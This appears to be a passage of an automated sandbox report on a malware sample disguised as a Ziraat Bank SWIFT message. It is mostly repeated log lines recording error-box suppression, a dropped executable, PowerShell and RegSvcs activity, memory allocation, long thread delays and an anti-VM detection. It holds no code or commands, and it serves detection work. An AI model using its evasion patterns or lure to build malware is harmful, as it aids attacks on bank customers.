Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 5520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ZnbATfUbUgZW.exe PID: 6396, type: MEMORYSTR

Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Memory allocated: 10A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Memory allocated: 2E20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Memory allocated: 2C30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Memory allocated: 6570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Memory allocated: 7570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Memory allocated: 76C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Memory allocated: 86C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Memory allocated: F70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Memory allocated: 2990000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Memory allocated: F70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Memory allocated: 5EA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Memory allocated: 6EA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Memory allocated: 6FE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Memory allocated: 7FE0000 memory reserve \| memory write watch

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599889	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599779	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599666	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599443	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597893	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597760	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597653	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597530	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596222	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595231	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594926	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594791	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594571	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594030	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593688	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5952	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 478	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6622	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 699	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 5306	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 4517	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1772	Thread sleep count: 5952 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3176	Thread sleep count: 478 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6508	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4564	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6480	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 984	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599889	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599779	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599666	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599443	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597893	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597760	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597653	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597530	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596222	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595231	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594926	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594791	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594571	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594140	Jump to behavior
